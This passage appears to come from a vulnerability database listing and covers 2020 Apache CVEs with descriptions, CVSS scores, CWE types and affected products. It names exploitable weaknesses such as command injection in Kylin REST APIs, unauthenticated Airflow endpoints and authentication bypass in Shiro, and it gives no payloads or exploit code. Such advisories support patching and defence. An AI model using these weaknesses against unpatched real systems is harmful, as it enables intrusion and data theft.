Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache ambari *
CVE-2020-13925 HIGH

Similar to CVE-2020-1956, Kylin has one more restful API which concatenates the API inputs into OS commands and then executes them on the server; while the reported API misses necessary input validation, which causes the hackers to have the possibility to execute OS command remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache kylin *
CVE-2020-13926 HIGH

Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is from system configurations, while the configuration can be overwritten by certain rest api, which makes SQL injection attack is possible. Users of all previous versions after 2.0 should upgrade to 3.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache kylin *
CVE-2020-13927 HIGH

The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,CWE-1188,CWE-306,CWE-1056,CWE-1188,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-13928 MEDIUM

Apache Atlas before 2.1.0 contain a XSS vulnerability. While saving search or rendering elements values are not sanitized correctly and because of that it triggers the XSS vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas *
CVE-2020-13929 MEDIUM

Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2020-13931 MEDIUM

If Apache TomEE 8.0.0-M1 - 8.0.3, 7.1.0 - 7.1.3, 7.0.0-M1 - 7.0.8, 1.0.0 - 1.7.5 is configured to use the embedded ActiveMQ broker, and the broker config is misconfigured, a JMX port is opened on TCP port 1099, which does not include authentication. CVE-2020-11969 previously addressed the creation of the JMX management interface, however the incomplete fix did not cover this edge case.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
apache tomee 8.0.0
CVE-2020-13932 MEDIUM

In Apache ActiveMQ Artemis 2.5.0 to 2.13.0, a specially crafted MQTT packet which has an XSS payload as client-id or topic name can exploit this vulnerability. The XSS payload is being injected into the admin console's browser. The XSS payload is triggered in the diagram plugin; queue node and the info section.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2020-13933 MEDIUM

Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache shiro *
CVE-2020-13934 MEDIUM

An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-401,CWE-476,

Products Affected

Vendor Product Version
opensuse leap 15.1
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle workload_manager 12.2.0.1
apache tomcat *
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle siebel_ui_framework *
debian debian_linux 9.0
opensuse leap 15.2
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
oracle managed_file_transfer 12.2.1.3.0
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle instantis_enterprisetrack 17.2
CVE-2020-13935 MEDIUM

The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
opensuse leap 15.1
mcafee epolicy_orchestrator 5.9.0
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle workload_manager 12.2.0.1
apache tomcat *
mcafee epolicy_orchestrator 5.9.1
oracle agile_plm 9.3.3
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle fmw_platform 12.2.1.4.0
oracle mysql_enterprise_monitor *
oracle blockchain_platform *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle communications_cloud_native_core_policy 1.14.0
oracle siebel_ui_framework *
mcafee epolicy_orchestrator 5.10.0
debian debian_linux 9.0
opensuse leap 15.2
oracle fmw_platform 12.2.1.3.0
oracle workload_manager 19c
canonical ubuntu_linux 16.04
oracle managed_file_transfer 12.2.1.3.0
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle instantis_enterprisetrack 17.2
CVE-2020-13936 HIGH

An attacker that is able to modify Velocity templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container. This applies to applications that allow untrusted users to upload/modify velocity templates running Apache Velocity Engine versions up to 2.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache velocity_engine *
oracle banking_enterprise_default_management 2.6.2
oracle banking_enterprise_default_management 2.7.1
oracle banking_party_management 2.7.0
oracle retail_xstore_office_cloud_service 20.0.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle retail_xstore_office_cloud_service 17.0.4
oracle retail_service_backbone 19.0.1
oracle communications_cloud_native_core_policy 1.14.0
oracle retail_xstore_office_cloud_service 19.0.2
oracle communications_network_integrity 7.3.6
debian debian_linux 9.0
oracle banking_platform *
oracle retail_order_broker 16.0
oracle banking_loans_servicing 2.12.0
oracle banking_deposits_and_lines_of_credit_servicing 2.12.0
apache wss4j 2.3.1
oracle banking_enterprise_default_management *
oracle retail_xstore_office_cloud_service 18.0.3
oracle retail_integration_bus 19.0.1
oracle utilities_testing_accelerator 6.0.0.3.1
oracle hospitality_token_proxy_service 19.2
oracle retail_xstore_office_cloud_service 16.0.6
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_enterprise_default_management 2.10.0
oracle banking_enterprise_default_management 2.12.0
CVE-2020-13937 MEDIUM

Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-922,

Products Affected

Vendor Product Version
apache kylin 2.6.2
apache kylin 2.6.0
apache kylin 3.0.0
apache kylin 2.3.0
apache kylin 2.0.0
apache kylin 2.5.2
apache kylin 2.4.0
apache kylin 2.6.4
apache kylin 2.1.0
apache kylin 2.2.0
apache kylin 2.6.5
apache kylin 2.4.1
apache kylin 2.6.6
apache kylin 3.0.1
apache kylin 3.0.2
apache kylin 4.0.0
apache kylin 2.3.2
apache kylin 2.5.0
apache kylin 2.5.1
apache kylin 3.1.0
apache kylin 2.6.1
apache kylin 2.3.1
apache kylin 2.6.3
CVE-2020-13938 LOW

Apache HTTP Server versions 2.4.0 to 2.4.46 Unprivileged local users can stop httpd on Windows

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache http_server *
netapp cloud_backup -
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
CVE-2020-13940 MEDIUM

In Apache NiFi 1.0.0 to 1.11.4, the notification service manager and various policy authorizer and user group provider objects allowed trusted administrators to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-13941 MEDIUM

Reported in SOLR-14515 (private) and fixed in SOLR-14561 (public), released in Solr version 8.6.0. The Replication handler (https://lucene.apache.org/solr/guide/8_6/index-replication.html#http-api-commands-for-the-replicationhandler) allows commands backup, restore and deleteBackup. Each of these take a location parameter, which was not validated, i.e you could read/write to any location the solr user can access.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache solr *
CVE-2020-13942 HIGH

It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,

Products Affected

Vendor Product Version
apache unomi *
CVE-2020-13943 MEDIUM

If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 9.0.10
apache tomcat 9.0.33
apache tomcat 8.5.5
apache tomcat 10.0.0
apache tomcat 8.5.31
apache tomcat 8.5.48
oracle instantis_enterprisetrack 17.3
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 9.0.4
apache tomcat 8.5.42
apache tomcat 9.0.12
apache tomcat 8.5.18
apache tomcat 9.0.27
apache tomcat 9.0.13
apache tomcat 9.0.9
apache tomcat 9.0.14
apache tomcat 9.0.16
apache tomcat 8.5.52
apache tomcat 9.0.0
apache tomcat 8.5.41
apache tomcat 8.5.21
apache tomcat 8.5.4
apache tomcat 8.5.11
oracle instantis_enterprisetrack 17.1
apache tomcat 8.5.47
apache tomcat 8.5.25
apache tomcat 8.5.39
apache tomcat 9.0.29
apache tomcat 9.0.30
apache tomcat 8.5.38
apache tomcat 8.5.46
apache tomcat 8.5.22
apache tomcat 8.5.7
apache tomcat 8.5.19
apache tomcat 8.5.49
apache tomcat 8.5.34
apache tomcat 9.0.35
apache tomcat 8.5.28
apache tomcat 9.0.3
apache tomcat 9.0.6
apache tomcat 8.5.20
apache tomcat 8.5.16
apache tomcat 8.5.27
apache tomcat 8.5.33
apache tomcat 9.0.34
oracle instantis_enterprisetrack 17.2
apache tomcat 9.0.18
apache tomcat 9.0.11
apache tomcat 9.0.21
apache tomcat 8.5.1
apache tomcat 9.0.7
apache tomcat 9.0.8
apache tomcat 9.0.1
apache tomcat 8.5.15
apache tomcat 8.5.43
apache tomcat 8.5.23
apache tomcat 8.5.24
apache tomcat 8.5.26
apache tomcat 9.0.22
apache tomcat 8.5.35
apache tomcat 9.0.31
debian debian_linux 9.0
apache tomcat 8.5.6
apache tomcat 8.5.45
apache tomcat 8.5.37
apache tomcat 8.5.8
apache tomcat 9.0.36
apache tomcat 8.5.0
apache tomcat 9.0.26
apache tomcat 8.5.51
apache tomcat 8.5.17
apache tomcat 9.0.15
apache tomcat 8.5.55
apache tomcat 9.0.28
apache tomcat 9.0.32
apache tomcat 9.0.25
debian debian_linux 10.0
apache tomcat 8.5.57
apache tomcat 8.5.29
apache tomcat 8.5.36
apache tomcat 9.0.19
apache tomcat 9.0.5
apache tomcat 9.0.17
apache tomcat 8.5.53
apache tomcat 8.5.40
apache tomcat 8.5.10
apache tomcat 8.5.12
apache tomcat 8.5.32
apache tomcat 8.5.44
apache tomcat 8.5.30
oracle sd-wan_edge 9.0
apache tomcat 9.0.2
apache tomcat 9.0.24
apache tomcat 8.5.13
apache tomcat 8.5.54
apache tomcat 9.0.23
apache tomcat 8.5.50
apache tomcat 9.0.20
apache tomcat 8.5.56
apache tomcat 8.5.3
apache tomcat 9.0.37
CVE-2020-13944 MEDIUM

In Apache Airflow < 1.10.12, the "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-13945 MEDIUM

In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache apisix *
CVE-2020-13946 MEDIUM

In Apache Cassandra, all versions prior to 2.1.22, 2.2.18, 3.0.22, 3.11.8 and 4.0-beta2, it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorised operations. Users should also be aware of CVE-2019-2684, a JRE vulnerability that enables this issue to be exploited remotely.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
netapp oncommand_insight -
apache cassandra *
apache cassandra 4.0.0
CVE-2020-13947 MEDIUM

An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the message.jsp page of Apache ActiveMQ versions 5.15.12 through 5.16.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
apache activemq *
CVE-2020-13948 MEDIUM

While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python’s `os` package in the web application process in versions < 0.37.1. It was thus possible for an authenticated user to list and access files, environment variables, and process information. Additionally it was possible to set environment variables for the current process, create and update files in folders writable by the web process, and execute arbitrary programs accessible by the web process. All other operations available to the `os` package in Python were also available, even if not explicitly enumerated in this CVE.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2020-13949 MEDIUM

In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
apache hive *
apache thrift *
oracle communications_cloud_native_core_policy 1.14.0
CVE-2020-13950 MEDIUM

Apache HTTP Server versions 2.4.41 to 2.4.46 mod_proxy_http can be made to crash (NULL pointer dereference) with specially crafted requests using both Content-Length and Transfer-Encoding headers, leading to a Denial of Service

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2020-13951 MEDIUM

Attackers can use public NetTest web service of Apache OpenMeetings 4.0.0-5.0.0 to organize denial of service attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2020-13952 MEDIUM

In the course of work on the open source project it was discovered that authenticated users running queries against Hive and Presto database engines could access information via a number of templated fields including the contents of query description metadata database, the hashed version of the authenticated users’ password, and access to connection information including the plaintext password for the current connection. It would also be possible to run arbitrary methods on the database connection object for the Presto or Hive connection, allowing the user to bypass security controls internal to Superset. This vulnerability is present in every Apache Superset version < 0.37.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2020-13953 MEDIUM

In Apache Tapestry from 5.4.0 to 5.5.0, crafting specific URLs, an attacker can download files inside the WEB-INF folder of the WAR being run.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2020-13954 MEDIUM

By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
oracle retail_order_broker_cloud_service 15.0
oracle business_intelligence 12.2.1.4.0
netapp vasa_provider_for_clustered_data_ontap *
apache cxf *
oracle communications_messaging_server 8.1
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle communications_messaging_server 8.0.2
CVE-2020-13955 MEDIUM

HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses internally this method to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache calcite *
CVE-2020-13956 MEDIUM

Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
oracle commerce_guided_search 11.3.2
oracle jd_edwards_enterpriseone_orchestrator *
oracle retail_customer_management_and_segmentation_foundation *
quarkus quarkus *
oracle data_integrator 12.2.1.4.0
oracle primavera_unifier 16.2
oracle peoplesoft_enterprise_peopletools 8.58
oracle primavera_unifier *
oracle nosql_database *
oracle spatial_studio *
oracle weblogic_server 12.2.1.4.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle primavera_unifier 20.12
apache httpclient *
oracle primavera_unifier 18.8
oracle peoplesoft_enterprise_pt_peopletools 8.57
netapp snapcenter -
oracle primavera_unifier 16.1
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle sql_developer *
oracle weblogic_server 14.1.1.0.0
oracle data_integrator 12.2.1.3.0
oracle peoplesoft_enterprise_pt_peopletools 8.59
CVE-2020-13957 HIGH

Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache solr *
CVE-2020-13958 HIGH

A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target users file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler and other hyperlinks require a control-click.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2020-13959 MEDIUM

The default error page for VelocityView in Apache Velocity Tools prior to 3.1 reflects back the vm file that was entered as part of the URL. An attacker can set an XSS payload file as this vm file in the URL which results in this payload being executed. XSS vulnerabilities allow attackers to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache velocity_tools *
CVE-2020-15250 LOW

In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. This vulnerability impacts you if the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder, and the JUnit tests execute in an environment where the OS has other untrusted users. Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. For Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. For Java 1.6 and lower users: no patch is available, you must use the workaround below. If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. For more information, including an example of vulnerable code, see the referenced GitHub Security Advisory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6
security-advisories@github.com 4.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N 0.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,CWE-732,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache pluto *
oracle communications_cloud_native_core_policy 1.14.0
junit junit4 *
CVE-2020-17508 MEDIUM

The ATS ESI plugin has a memory disclosure vulnerability. If you are running the plugin please upgrade. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2020-17509 MEDIUM

ATS negative cache option is vulnerable to a cache poisoning attack. If you have this option enabled, please upgrade or disable this feature. Apache Traffic Server versions 7.0.0 to 7.1.11 and 8.0.0 to 8.1.0 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2020-17510 HIGH

Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
